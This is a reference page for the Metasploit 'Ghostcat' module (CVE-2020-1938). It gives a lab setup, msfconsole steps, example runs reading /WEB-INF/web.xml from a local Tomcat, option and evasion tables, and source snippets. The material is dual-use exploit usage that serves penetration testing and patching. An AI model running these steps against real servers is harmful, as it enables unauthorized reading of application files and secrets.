Ghostcat - Metasploit
This page contains detailed information about how to use the auxiliary/admin/http/tomcat_ghostcat metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Ghostcat
Module: auxiliary/admin/http/tomcat_ghostcat
Source code: modules/auxiliary/admin/http/tomcat_ghostcat.rb
Disclosure date: 2020-02-20
Last modification time: 2021-10-03 16:30:12 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): 8080
List of CVEs: CVE-2020-1938
This module is also known as Ghostcat.
When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed: - returning arbitrary files from anywhere in the web application - processing any file in the web application as a JSP. Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Stability:
- CRASH_SAFE: Module should not crash the service.
Basic Usage
msf > use auxiliary/admin/http/tomcat_ghostcat
msf auxiliary(tomcat_ghostcat) > show targets
... a list of targets ...
msf auxiliary(tomcat_ghostcat) > set TARGET target-id
msf auxiliary(tomcat_ghostcat) > show options
... show and set options ...
msf auxiliary(tomcat_ghostcat) > exploit
Required Options
- RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
Knowledge Base
Vulnerable Application
Description
This module can be used to retrieve arbitrary files from anywhere in the web application, including the WEB-INF
and META-INF
directories and any other location that can be reached via ServletContext.getResourceAsStream() on Apache Tomcat servers.
It also allows the attacker to process any file in the web application as JSP.
Setup
Running within a docker container:
docker run --name tomcat --rm -p 8080:8080 -p 8009:8009 tomcat:8.5.32
Verification Steps
- Install the application and start it
- Start msfconsole
- Do:
use auxiliary/admin/http/tomcat_ghostcat
- Do:
set RHOSTS [ip]
- Do:
set RPORT [port]
- Do:
set FILENAME [filename]
- Do:
run
Options
FILENAME
The file you would like to retrieve from the target web application.
AJP_PORT
The port on the target that is running the Apache JServ Protocol (AJP).
Scenarios
Apache Tomcat 8.5.32
msf6 > use auxiliary/admin/http/tomcat_ghostcat
msf6 auxiliary(admin/http/tomcat_ghostcat) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 auxiliary(admin/http/tomcat_ghostcat) > set RPORT 8080
RPORT => 8080
msf6 auxiliary(admin/http/tomcat_ghostcat) > set FILENAME /WEB-INF/web.xml
FILENAME => /WEB-INF/web.xml
msf6 auxiliary(admin/http/tomcat_ghostcat) > run
[*] Running module against 127.0.0.1
Status Code: 200
Accept-Ranges: bytes
ETag: W/"1227-1529524397000"
Last-Modified: Wed, 20 Jun 2018 19:53:17 GMT
Content-Type: application/xml
Content-Length: 1227
<xml version="1.0" encoding="UTF-8"?>
<!--
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
Welcome to Tomcat
Welcome to Tomcat
[+] 127.0.0.1:8080 - /Users/user/.msf4/loot/20210408102538_default_127.0.0.1_WEBINFweb.xml_436040.txt
[*] Auxiliary module execution completed
Apache Tomcat on Windows 10.0.16299.125
[*] Processing tomcat_ghostcat.rb for ERB directives.
resource (tomcat_ghostcat.rb)> use auxiliary/admin/http/tomcat_ghostcat
resource (tomcat_ghostcat.rb)> set rport 8080
rport => 8080
resource (tomcat_ghostcat.rb)> set rhosts 127.0.0.1
rhosts => 127.0.0.1
resource (tomcat_ghostcat.rb)> set verbose true
verbose => true
resource (tomcat_ghostcat.rb)> set FILENAME /WEB-INF/web.xml
filename => /WEB-INF/web.xml
resource (tomcat_ghostcat.rb)> run
[*] Running module against 127.0.0.1
<xml version="1.0" encoding="UTF-8"?>
<!--
Copyright 2017 The MIT Internet Trust Consortium
Portions copyright 2011-2013 The MITRE Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
version = "4.0"
metadata-complete="true">
Welcome to Tomcat
Welcome to Tomcat
[*] Auxiliary module execution completed
Go back to menu.
Msfconsole Usage
Here is how the admin/http/tomcat_ghostcat auxiliary module looks in the msfconsole:
msf6 > use auxiliary/admin/http/tomcat_ghostcat
msf6 auxiliary(admin/http/tomcat_ghostcat) > show info
Name: Ghostcat
Module: auxiliary/admin/http/tomcat_ghostcat
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2020-02-20
Provided by:
A Security Researcher of Chaitin Tech
SunCSR Team
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
AJP_PORT 8009 no The Apache JServ Protocol (AJP) port
FILENAME /WEB-INF/web.xml yes File name
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 8080 yes The Apache Tomcat webserver port (TCP)
SSL false yes SSL
Description:
When using the Apache JServ Protocol (AJP), care must be taken when
trusting incoming connections to Apache Tomcat. Tomcat treats AJP
connections as having higher trust than, for example, a similar HTTP
connection. If such connections are available to an attacker, they
can be exploited in ways that may be surprising. In Apache Tomcat
9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat
shipped with an AJP Connector enabled by default that listened on
all configured IP addresses. It was expected (and recommended in the
security guide) that this Connector would be disabled if not
required. This vulnerability report identified a mechanism that
allowed: - returning arbitrary files from anywhere in the web
application - processing any file in the web application as a JSP.
Further, if the web application allowed file upload and stored those
files within the web application (or the attacker was able to
control the content of the web application by some other means) then
this, along with the ability to process a file as a JSP, made remote
code execution possible. It is important to note that mitigation is
only required if an AJP port is accessible to untrusted users. Users
wishing to take a defence-in-depth approach and block the vector
that permits returning arbitrary files and execution as JSP may
upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A
number of changes were made to the default AJP Connector
configuration in 9.0.31 to harden the default configuration. It is
likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later
will need to make small changes to their configurations.
References:
https://nvd.nist.gov/vuln/detail/CVE-2020-1938
Module Options
This is a complete list of options available in the admin/http/tomcat_ghostcat auxiliary module:
msf6 auxiliary(admin/http/tomcat_ghostcat) > show options
Module options (auxiliary/admin/http/tomcat_ghostcat):
Name Current Setting Required Description
---- --------------- -------- -----------
AJP_PORT 8009 no The Apache JServ Protocol (AJP) port
FILENAME /WEB-INF/web.xml yes File name
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 8080 yes The Apache Tomcat webserver port (TCP)
SSL false yes SSL
Advanced Options
Here is a complete list of advanced options supported by the admin/http/tomcat_ghostcat auxiliary module:
msf6 auxiliary(admin/http/tomcat_ghostcat) > show advanced
Module advanced options (auxiliary/admin/http/tomcat_ghostcat):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
ConnectTimeout 10 yes Maximum number of seconds to establish a TCP connection
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
SSLCipher no String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
SSLVerifyMode PEER no SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the admin/http/tomcat_ghostcat module can do:
msf6 auxiliary(admin/http/tomcat_ghostcat) > show actions
Auxiliary actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the admin/http/tomcat_ghostcat auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(admin/http/tomcat_ghostcat) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
TCP::max_send_size 0 no Maxiumum tcp segment size. (0 = disable)
TCP::send_delay 0 no Delays inserted before every send. (0 = disable)
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Error socket
Here is a relevant code snippet related to the "Error socket" error message:
201: begin
202: connect(true, { 'RHOST' => datastore['RHOST'].to_s, 'RPORT' => datastore['AJP_PORT'].to_i, 'SSL' => datastore['SSL'] })
203: sock.put(data)
204: buf = sock.get(30) || ''
205: rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
206: elog('Error socket', error: e)
207: ensure
208: disconnect
209: end
210: buf
211: end
Successfully read file <FILENAME>
Here is a relevant code snippet related to the "Successfully read file <FILENAME>" error message:
303: end
304:
305: def check
306: read_remote_file
307: if read_success?(@header_data)
308: return Exploit::CheckCode::Appears("Successfully read file #{datastore['FILENAME']}")
309: end
310:
311: Exploit::CheckCode::Safe
312: rescue StandardError => e
313: Exploit::CheckCode::Unknown(e.message)
Unable to read file, target may not be vulnerable.
Here is a relevant code snippet related to the "Unable to read file, target may not be vulnerable." error message:
321: if read_success?(@header_data)
322: file = store_loot(
323: datastore['FILENAME'].to_s, 'text/plain', datastore['RHOST'].to_s,
324: @body_data, 'Ghostcat File Read/Inclusion', 'Read file', datastore['FILENAME']
325: )
326: print_good file
327: else
328: print_error 'Unable to read file, target may not be vulnerable.'
329: end
330: end
331: end
Go back to menu.
Related Pull Requests
- #15243 Merged Pull Request: Add check method to tomcat ghostcat module
- #15192 Merged Pull Request: Enforce Style/RedundantBegin for new modules
- #15017 Merged Pull Request: Update tomcat ghost module with default ports
- #14806 Merged Pull Request: Rubocop recently landed modules continued
- #14734 Merged Pull Request: Rubocop recently landed modules
- #14394 Merged Pull Request: Apache Tomcat - AJP 'Ghostcat' File Read/Inclusion
References
See Also
Check also the following modules related to this module:
- auxiliary/admin/http/tomcat_administration
- auxiliary/admin/http/tomcat_utf8_traversal
- auxiliary/scanner/http/tomcat_enum
- auxiliary/scanner/http/tomcat_mgr_login
- exploit/multi/http/tomcat_jsp_upload_bypass
- exploit/multi/http/tomcat_mgr_deploy
- exploit/multi/http/tomcat_mgr_upload
- exploit/windows/http/tomcat_cgi_cmdlineargs
- post/multi/gather/tomcat_gather
- auxiliary/dos/http/apache_tomcat_transfer_encoding
- post/windows/gather/enum_tomcat
Authors
- A Security Researcher of Chaitin Tech
- SunCSR Team
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.